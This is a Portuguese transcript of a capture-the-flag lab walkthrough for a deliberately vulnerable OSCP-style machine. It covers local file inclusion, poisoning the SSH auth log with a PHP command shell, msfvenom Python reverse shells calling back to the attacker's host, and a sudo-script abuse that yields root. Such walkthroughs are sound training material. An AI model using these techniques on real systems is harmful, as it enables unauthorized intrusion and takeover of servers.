Fala pessoal, beleza? Vamos começar aqui então a nossa 10ª máquina, né? Essa máquina, a The Eater aqui, né? Como o próprio desenvolvedor dela que já disse que ela não é uma máquina para iniciantes, então é uma máquina mais difícil aí, né? É uma máquina OSCP-like para quem está estudando para OSCP. Então a gente vai fazer a exploração dela manualmente, né? Da mesma forma que você faria lá na OSCP sem utilizar o Metasploit, tá? A gente vai explorar uma falha de LFI nessa máquina. Eu vou deixar alguns links para vocês estudarem sobre LFI aí. Porque para conseguir explorar essa máquina, não basta só você dar um barra etc barra pswd lá no LFI, né? E como a gente fez antes. Esse aqui é um pouquinho mais complexo. Você vai ter que ir na tentativa e erro aí para conseguir descobrir as coisas nela. O ataque inicial que a gente vai fazer para onar essa máquina é um log poisoning, onde a gente vai envenenar um log do SSH para conseguir inserir uma shell nossa, né, dentro do server. E aí, após a exploração aí para a gente fazer o escalonamento de privilégio, a gente vai abusar de uma configuração de script em Python aí do administrador da máquina. Para criar a nossa shell em Python, ao invés de codificar lá utilizando sockets e tal, né? Sockets a gente vai utilizar o MSF Venom para criar um payload em Python, né? Um payload reverso. Vocês já vão ver tudo isso na prática aí. Esse tipo de payload pode usar no SCP, não pode utilizar só o Meterpreter, tá? Então vamos lá. Vamos para a nossa parte prática aqui. Eu já fiz aí a análise inicial de qual que é o IP da máquina, né? Para subir essa máquina foi bem tranquilo. É, Mesmo sendo de VMware a máquina, eu criei uma máquina nova com Debian e utilizei como disco esse primeiro evilscience.vmdk aqui, ó, que é o disco da máquina. Ela já subiu de primeira. E no fim deu tudo certo. A primeira coisa a gente vai escanear ela para ver o que está rodando, né? Sudo nmap. Vou dar um "-sv" aqui para ver a versão dos serviços, 192.68.2.20, que é o IP que ela pegou aqui na minha estrutura. Então, não importa muito, né, o que está rodando de serviço aqui, porque está rodando só um APNSSH e um Apache aqui, não vai ter vulnerabilidade nesses dois caras. Como é que a gente vai fazer para explorar esse cara aí? A gente vai ter que utilizar o burp para manipular algumas requisições aqui no browser, então eu não vou explicar como configura o burp, já tem vídeo aqui no canal lá do primeiro desafio explicando isso. Se alguém quiser saber e não conseguir configurar o burp aí, manda no grupo lá que a gente ajuda, tá? Então a primeira coisa que a gente precisa fazer aqui nesse cara é abrir no browser, né, a máquina para a gente ver a aplicação aí, o que está rolando, né? Então se você navegar aqui pela aplicação, você vai ver que ele faz um include aqui, ó, do about PHP dentro do index.php. Então a gente pode usar esse cara aqui para fazer a nossa tentativa aí de LFI. Então você pode ligar o teu intercept aqui no proxy do burp, né, e mandar a requisição. Ela vai vir aqui para o intercept, já pode minimizar o browser, não vamos mais utilizar ele. Então aqui a gente já tem a requisição que a gente vai tentar manipular. Para a gente não ter que ficar dando F5 aqui e ficar iniciando de novo a requisição, você clica com o direito aqui e manda ela pro repeater, ou dá um Ctrl R, né? Que aqui no repeater você consegue manipular quantas vezes você quiser e ele aparece a resposta aqui, né, do lado de cá. Então, a primeira coisa que a gente faz aqui, né, é mandar um send aqui para a gente ver qual que é a primeira resposta que a gente tem. Então, qual que é a primeira resposta aqui, né? É um código do index.php. Significa o quê? Que ele está renderizando um PHP aqui, né, um HTML com PHP. Então a gente recebeu aqui um 200 ok, tá tudo certo a requisição. Se você tentar aqui, ó, inserir algum comando, né? Tipo, por exemplo, faz o patch traversal aqui, né? Voltando os diretórios, ó. Vou voltar algumas vezes aqui, chamar o barra etc barra pswd. Quando você dá um send aqui, ó, você pode ver que ele aumentou um espaço aqui, ó, entre a linha 8 e 9, e ele continua dando 200 ok. Então o que que significa isso? Que provavelmente ele não tem permissão de leitura aqui para esse arquivo, né? Ou ele não encontrou o arquivo, mas ele está injetável aqui. A gente consegue chamar, né, um arquivo aqui dentro. Então, na tentativa e erro, você vai pesquisando aí sobre LFI, você vai acabar chegando aí, né, nesse ataque que a gente falou sobre o log poisoning. Como é que isso funciona? Se a gente conseguir abrir algum tipo de log do servidor aqui dentro dessa página, essa página é uma página em PHP, então se a gente sujar o log com um arquivo, com um comando PHP,
para o log não vai fazer diferença, mas a hora que você abre o log dentro dessa página PHP aqui, ele vai executar o comando PHP que você passou como um comando realmente da página aqui, porque ele vai renderizar isso aqui na página, então o PHP vai interpretar, né, o que está escrito lá. Primeiro de tudo, você precisa saber um pouco sobre os logs no Linux. Então, se você for aqui no seu Linux, no /var/log, você vai ver que tem vários tipos de arquivo de log aqui dentro. Esse arquivo out.log, ele é um arquivo de autenticação, de log de autenticação, que ele mostra, por exemplo, se você tentar logar no SSH aqui, né, ele vai mostrar esse tipo de log. Então, na tentativa e erro, até você achar o que você consegue abrir aqui, se você der um /var/log /out.log e mandar aqui a requisição, você vai ver que ele vai mostrar aqui as requisições de logs, né? O que tem dentro do log. O de vocês vai aparecer só dois aqui, porque eu fiz um monte de teste, então ele vai aparecer um monte de requisição aqui. Que eu escrevi, já até escrevi alguns comandos aqui, e por isso que tá aparecendo aqui. Mas então, a primeira parte da exploração é essa, é você conseguir mostrar o log aqui. Mostrou o log, então agora eu preciso autenticar aqui de alguma forma, para sujar o log lá, né, com algum comando para ele aparecer aqui. Então, se você tentar conectar via SSH lá, ó, SSH, eu vou colocar o usuário o Batata aqui para mostrar para vocês. @192.168.2.20. Só de eu tentar autenticar lá, ele já vai, se eu der um send aqui de novo, ele já vai aparecer aqui que a última requisição lá, ó, foi o usuário Batata, né? Ele fez uma pré-autenticação, então ele mandou o login, está esperando a resposta da senha. Então já mandou o user request, ó, ele já mostrou aqui o usuário Batata, né, que acabou de rodar aqui. Então o que acontece? Como ele mostrou a palavra batata aqui, ó, dentro dessa página PHP, se eu trocar o batata por um código PHP, ele vai interpretar aqui na página. Então como é que eu vou fazer isso? Eu vou chamar de novo, né, o SSH, e aqui, em vez de passar o usuário, eu abro aspas simples e aqui eu inicio então o meu código PHP, ó. Então essa aqui é a estrutura do PHP, né? Aqui dentro você pode executar comandos. Eu vou chamar o system, que é o mesmo que o sysexec, que é o mesmo que o exec, né? Uma biblioteca de PHP que consegue inserir comandos dentro do servidor, né? A gente pode simplesmente passar aqui dentro o comando que a gente quer, mas aí ele vai ficar sujando os logs lá e a gente vai ter que ficar mandando várias requisições. A gente pode fazer isso com o parâmetro get, né? Essa aqui é a sintaxe para usar o método get. E aqui dentro do método get você pode colocar aqui uma variável, né? Eu vou chamar isso aqui então sei lá, vou botar uma letra aqui, G. Pode colocar o que você quiser, né, aqui dentro. Tem gente que põe CMD, pode pôr o que quiser aqui. Vamos botar K, sei lá, pode ser. O que vai acontecer? Quando a gente fizer a requisição, a gente vai chamar pelo método get, a gente vai passar um comando para dentro do K, que ele vai executar isso no system, dentro do sistema. Beleza? Então isso é a nossa shell simples aqui, né, de PHP. Então @192.168.2.20, que é o IP lá da máquina, né? Bom, tentei bater lá, já sujou o log lá, a gente já consegue fazer a requisição aqui. Chamei de novo só para ele aparecer aqui a última tentativa de autenticação, né? Então aqui dentro da requisição, agora se você botar um e-comercial aqui, para chamar para a gente conseguir chamar ali o nosso parâmetro, né? Eu posso colocar aqui, a gente colocou o parâmetro K, eu vou dar um igual aqui, então o que eu estou dizendo aqui? Que a hora que chamar o var/log aqui, eu estou passando para ele como o parâmetro que eu quiser passar aqui dentro do server. Se eu dar um ls, por exemplo, ó, e mandar o send aqui no final do log ele deu um ls lá no server. Então se eu der por exemplo, um ramai aqui, e mandar lá o send, ó, aqui no final do log ele vai mostrar aqui que o usuário é o www.data, ó, tá vendo? Então, só que aqui, cara, se você tentar mandar outros comandos, se eu, por exemplo, tentar dar um ls-lha, tá vendo que o "-lha" ele saiu fora do comando aqui? Ele não vai deixar você executar, vai dar até um erro aqui, ó, deu um bad request. Então, para você fazer isso, você vai ter que encodar esse cara, né, em HTML, aqui, encodar ele como URL, encodar como URL para você poder passar aqui como parâmetro. Então, eu vou até apagar aqui o parâmetro para não dar erro. Você pode vir aqui no decoder. Opa, aqui já está
a shell que a gente vai executar. Aqui no decoder você pode encodar um comando, por exemplo, ls-lha. Se você clicar no encode as aqui, ó, e colocar o URL, ele vai aparecer aqui embaixo como está o meu aqui, ó, o que você digitou encodado, né, para você poder executar ele na URL. Então eu vou voltar aqui para o repeater, ó, e vou substituir aqui o meu comando por esse comando encodado. Então quando eu mandar ele lá para o server, ó, agora ele vai conseguir executar o ls-lha aqui dentro. Então a gente já viu aqui que tem até na estrutura da raiz aqui do servidor web, tem até um script em Python aqui, ó, né, que chama log auditor. Então, opa, isso aqui já chama a nossa atenção, né? Já talvez até seja por isso que a gente conseguiu abrir o arquivo de log. Então, o que a gente vai fazer agora? A gente viu que a gente consegue executar comandos dentro do servidor. Então a gente pode abrir agora uma sessão, né, uma shell interativa, que até na tua prova lá você não vai conseguir, só essa shell aqui no browser não vale, você precisa de uma shell interativa, né? Então para isso eu vou iniciar aqui um handler, né? Vou dar um sudo nc de netcat-nlvp, que é para deixar escutando aqui em modo verboso, na porta 80, que vai ser o nosso primeiro acesso. Então deixei ele escutando aqui. Agora a gente vai criar aqui com o MSF Venom. O MSF Venom é uma ferramenta da suite do Metasploit que tem dentro aqui do Kali, né? Que ele permite você criar algumas shells, né? Sejam shells simples, né? Ou então as shells mais elaboradas como o Meterpreter. Mas uma shell simples, como a que a gente vai criar em Python, ela só faz uma conexão via socket e ela encoda essa conexão aí em base 64. Quer ver? Ó? A gente vai dar um MSF Venom, "-p de payload, cmd barra unix, unix barra reverse underline Python. A gente tem que passar um lhost, né, que é o host onde ele vai se conectar. Então lhost igual 192.168.2.5, que é o IP do meu Kali. Lport igual a porta 443, que é onde a gente quer que ele se conecte, né? A gente sempre usa 443 aí. Tá vendo que é a mesma coisa que usar um payload lá dentro do Metasploit, né? Mas a gente não vai utilizar ele lá, a gente vai executar manualmente. Então, lport 443 menos fhow aqui para ele sair imprimir o código do payload aqui para a gente, ao invés de salvar isso num arquivo. Então a gente tem o comando todo aqui, ó, python-c de linha de comando, ele vai dar um exec. Então tudo que ele vai executar dentro desse exec, ele utilizou o base 64 para encodar todo todo o script, né? E a gente consegue executar isso aqui dentro do Linux lá, ele vai abrir uma sessão com a gente na porta 80, que foi o que a gente escreveu lá no payload. Então a gente deixou o listening escutando aqui na porta 80. Agora a gente vai lá no nosso burp de novo. A gente vai ter que encodar isso mais uma vez, né, para poder fazer a request ali dentro do nosso vetor de exploração. Então tá vendo que ele criou uma request gigantona aqui, né? Então você vai voltar aqui no teu repeater e vai substituir o comando aqui por esse comandão gigante nosso aqui. Então repare aqui no listener aqui atrás, quando eu dou um send, ó, a primeira coisa que ele vai fazer é ler o log aqui. Opa, peraí que deu erro. Acho que eu devo ter comido a linha aqui. Deixa eu só dar um ls de novo para ver se está funcionando. Tá, beleza. Vou substituir o ls pelo nosso comando aqui. Ah, a gente puta 443 na porta do... Aí não abre mesmo, né? Sudo nc-nlvp na porta 443. Eu tava esperando a conexão na porta 80 e mandando eles conectar na 443, aí não funciona, né? Então agora eu dou um send aqui, ó, tá vendo? Ele abriu a conexão aqui atrás. Funcionou então o nosso exploit, né? Então a gente está aqui com o usuário www-data dentro da máquina. Então a gente já caiu no diretório raiz aqui do servidor web, né? E a gente viu aqui que ele tem esse script aqui em Python, né? O log auditor, que provavelmente esse administrador da máquina ele utiliza para ler logs de alguma forma. Se você der um sudo "-l aqui mesmo com o usuário www-data, você vai ver que ele tem permissão para executar como root esse script. Então isso demonstra talvez o porquê a gente conseguiu ler esse log, né? E isso aqui é uma falha de configuração, então o administrador aí fez besteira de configurar deixar, né, a permissão de root para todo mundo executar
esse cara aqui, a gente vai abusar desse script então. A gente não tem permissão para escrever nele, mas a gente vai utilizar um operador lógico para executar mais de um comando dentro dele. Primeira coisa que a gente precisa fazer é spawnar o nosso TTY aqui, né, para poder executar esse comando direito. Então, a gente, como sempre, né, Python "-c" de linha de comando, import para importar o PTY, a gente chama o PTY para instanciar o spawn, que vai chamar o barra bin. Nesse caso eu vou chamar o barra bin barra sh, que pode ser o barra bash também, tanto faz, como você preferir, mas eu vou usar o sh aqui. Opa, escrevi spawn ao invés de spawn. Python "-c" de linha de comando, é isso aí, não estou editando os vídeos, então vocês vão ver os erros também. Import pty.spawn, agora escrevi certo, barra bin barra sh. Fecha o parênteses aqui, beleza, spawnou, a gente já tem aqui o nosso TTY. Legal? Então, né, lembrando aqui, dando um sudo "-l", a gente viu aqui que a gente consegue executar esse cara como root. Então, primeiro a gente precisa criar um script em Python aqui dentro do server para a gente conseguir fazer esse script do cara rodar junto com o nosso script. Então, primeiro de tudo, a gente precisa, né, criar uma shell aí em Python novamente, né, já que a gente não salvou aquilo num arquivo. Então, vamos de novo aqui, msf veno, "-p" de payload, né, cmd barra unix barra reverse underline python, lhost, que é a gente, né, igual a 192.168.2.5, que é o IP do nosso Kali. Lport igual agora sim a gente vai usar a 80, né, que a gente já usou a 443 para a primeira shell, então não dá para usar a 443 de novo. Vamos utilizar a 80, "-f how aqui para ele salvar isso como código, e eu vou mandar essa saída do how aqui sair dentro do arquivo arquivo.python, pode ser. Esperar ele terminar de criar a shell aqui pra gente. Ó, ele já criou então essa shell. A primeira coisa que a gente precisa fazer é jogar ela para o server. Então, ó, vamos usar um Python "-m", né, de módulo aqui, simple http server, na porta 8080. Aqui no servidor a gente sempre tem a permissão de escrever no "-tmp. Então vamos lá para o "-tmp. Vamos dar um wget http 192.168.2.5, que é o IP do meu Kali, na porta 8080, barra arquivo.python. Então ele fez o download já aqui do arquivo.python. Então agora a gente já tem um arquivo aqui dentro do server. Só para garantir que ele vai conseguir ser executado, eu vou dar um chmod 777 aqui nesse arquivo, né, para ele ter todo tipo de permissão possível no arquivo.py. Beleza? Então agora a gente vai tentar fazer a conexão aqui. Então eu vou abrir um handler aqui no nosso Kali, sudo nc-nlvp na porta 80, né? Que a gente já criou lá o nosso nossa conexão reversa lá, a gente só vai tentar executar ela agora. Se você executar com o teu usuário que já está aqui, ele vai abrir de novo a conexão com o usuário www.data, né? O que a gente quer é abusar aqui desse script aqui, o log auditor. Então, se você chamar esse cara aqui, vou dar um Ctrl Shift C para copiar ele aqui, sudo e o script, ó, sudo o diretório, né, do script todo aqui, ele vai executar o log auditor lá do maluco. E esse log auditor ele consegue ler o barra var barra log barra out.log aqui e o barra var barra log barra apache barra access.log. Então, ao invés dele configurar direito o access.log lá para só esse script conseguir ler ele, o cara pegou e deu uma permissão de root, né, pro script ler o que está na pasta lá. E esse que foi o erro do administrador. Então, se a gente chamar aqui, né, o barra var barra log barra apache 2 barra accesslog ponto log, né, ele iria, access
.log, ele iria ler esse script que está aqui, certo? Então a gente pode utilizar um operador lógico aqui agora, que é um e, né, para executar esse script e mais um script, que vai estar em /tmp, a gente chamou ele de dados, né? Acho que foi isso. Deixa eu só ver se foi dados mesmo. Não, arquivo. A gente chamou ele de arquivo.tmp. Opa, arquivo.python. Então agora quando a gente executar esse cara, repare que a gente recebeu uma conexão aqui embaixo. Por quê? Porque ele leu, né, o log aqui e também executou o nosso, porque a gente usou um operador E aqui. Então ele conseguiu conectar, ó. Então a gente conectou, agora a gente tem o usuário root aqui embaixo. Beleza? Essa máquina foi bem divertida de fazer aí, né? Deixa eu ir no cd/root aqui. Então foi bem divertido aí de onar essa máquina. Foi bem mais difícil que as máquinas anteriores aí também, né? A tendência agora é só piorar aí a brincadeira. Aqui embaixo na descrição tá os links para vocês estudarem sobre os temas que a gente falou aqui nesse vídeo. Também está disponível o link da máquina de amanhã. E se vocês precisarem de alguma coisa, manda mensagem lá no grupo, beleza? Quem não se inscreveu no canal ainda, se inscreve aí para dar uma força pra gente. Quem está participando do desafio, se não tiver inscrito aqui no canal, não vai receber o certificado, hein? Beleza, pessoal? Então, aguardo vocês aí no próximo vídeo. Falou!